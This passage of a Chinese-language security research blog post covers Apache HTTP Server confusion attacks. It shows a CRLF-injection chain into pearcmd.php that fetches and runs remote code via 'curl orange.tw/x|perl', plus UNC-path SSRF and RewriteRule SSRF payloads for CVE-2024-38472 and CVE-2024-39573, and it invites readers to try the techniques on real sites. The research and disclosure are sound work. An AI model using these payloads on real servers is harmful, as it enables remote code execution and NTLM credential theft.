最後來展示一下如何透過一個常見的 CTF 小技巧把這個攻擊手法轉化成 RCE! 由於 PHP 官方的 Docker 映像檔在建構時引入了 PEAR 這套命令列 PHP 套件管理工具,透過其中的 Pearcmd.php作為入口點可以讓我們達成更進一步的利用,詳細的歷史及原理可以參考由 Phith0n撰寫的 Docker PHP LFI 總結文

這裡我們利用在 run-tests內的 Command Injection 來完成整個攻擊鏈,詳細的攻擊鏈如下:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a

網路上經常在 Security Advisory 或 Bug Bounty 看到把 CRLF Injection 或 Header Injection 當成 XSS 報告,雖然確實有機會透過 SSO 串出 Account Takeover 等精彩漏洞,但請不要忘了它也能串出 Server-Side RCE,這個示範證明了它的可能!


🔥 4. 其它漏洞

基本上整個 Confusion Attacks 系列到這邊差不多告一個段落,然而在研究 Apache HTTP Server 的過程中還有些值得一提的漏洞因此將它們獨立出來。


⚔️ CVE-2024-38472 - 基於 Windows UNC 的 SSRF

首先是 apr_filepath_merge()函數在 Windows 的實作允許使用 UNC 路徑,下面提供兩種不同的觸發路徑讓攻擊者可以向任意主機發起 NTLM 認證:

✔️ 透過 HTTP 請求解析器觸發

想要直接透過 HTTP 請求觸發需要在 Httpd 中設置額外的設定,雖然這個設定第一眼看起來有點不現實,但似乎經常與 Tomcat (mod_jkmod_proxy_ajp) 或是與 PATH_INFO一起出現:

AllowEncodedSlashesOn

另外由於 Httpd 在 2.4.49 後重寫了核心 HTTP 請求解析器邏輯,要在大於此版本的 Httpd 上觸發漏洞需要再額外加上一個設定:

AllowEncodedSlashesOn
MergeSlashes Off

透過兩個 %5C可以使強迫 Httpd 向 attacker-server發起 NTLM 認證,實務上也可透過 NTLM Relay的方式將此 SSRF 轉化成 RCE!

$ curl http://server/%5C%5Cattacker-server/path/to

✔️ 透過 Type-Map 觸發

Debian/Ubuntu 的 Httpd 發行版中預設啟用了 Type-Map:

AddHandler type-map var

透過上傳一個 .var檔案到伺服器,將其中 URI 欄位指定成 UNC 路徑也可強迫伺服器向攻擊者發起 NTLM 認證,這也是我所提出的第二個 .var小技巧😉


⚔️ CVE-2024-39573 - 基於 RewriteRule前綴可完全控制的 SSRF

最後則是當位於 Server Config或是 VirtualHost中的 RewriteRule前綴完全可控時,可以呼叫到 Proxy 以及相關子模組:

RewriteRule ^/broken(.*) $1

透過下列網址可將請求轉交給 mod_proxy處理:

$ curl http://server/brokenproxy:unix:/run/[...]|http://path/to

但如果網管有好好測試,就會發現這樣子的規則是不實際的,所以原本只把它當成另外一個漏洞的搭配組合一起回報,沒想到這個行為也被當成一個安全邊界修復。 再隨著修補出來後也看到其他研究員把同樣行為套用在 Windows UNC 上獲得另外一個額外的 CVE。


未來研究方向

最後是關於這份研究的未來的一些展望以及可加強的地方,基本上 Confusion Attacks 仍然是一個很有潛力的攻擊面,尤其是我這次的研究主要也只專注在兩個欄位上而已,只要 Apache HTTP Server 沒有好好從底層進行結構性加強或提供給開發者一個好的開發標準,相信未來還會有更多「混淆」出現!

至於還有哪些方面可以加強呢? 其實不同的 Httpd 發行版會有不同的設定檔案,因此其它的 Unix-Like 系統例如 RHEL 家族、BSD 系列,甚至使用到 Httpd 的套裝軟體,它們都有機會出現更多可跳脫的重寫規則、更多厲害的 Local Gadgets 甚至意料外的符號跳躍等等 ,就交給有興趣的人繼續吧。

最後由於時程因素,來不及分享更多在實際網站、設備,甚至開源專案上發現並利用的真實案例,不過你應該已經可以想像 —— 在真實世界中絕對還藏著千千萬萬個比想像中還要大量未開採的規則、可繞過的認證,以及隱藏在檯面下的 CGI,至於如何把這篇裡面所講到的技巧實際應用在全世界上? 接下來就是你們的任務了!


結語

維護一個 Open Source 專案真的是一件很困難的事,尤其在讓使用者方便的同時兼顧舊版本的相容性,稍有不慎可能就會造成整個系統被攻破 (例如 Httpd 2.4.49 中因為一個路徑處理邏輯小改動導致災難性的 CVE-2021-41773),整個開發過程必須要小心翼翼的踩在一堆遺留程式碼以及技術債上。 所以如果真的有 Apache HTTP Server 的開發者看到這篇文我想說: 謝謝你們的貢獻!

Viewing all 145 articles
Browse latest View live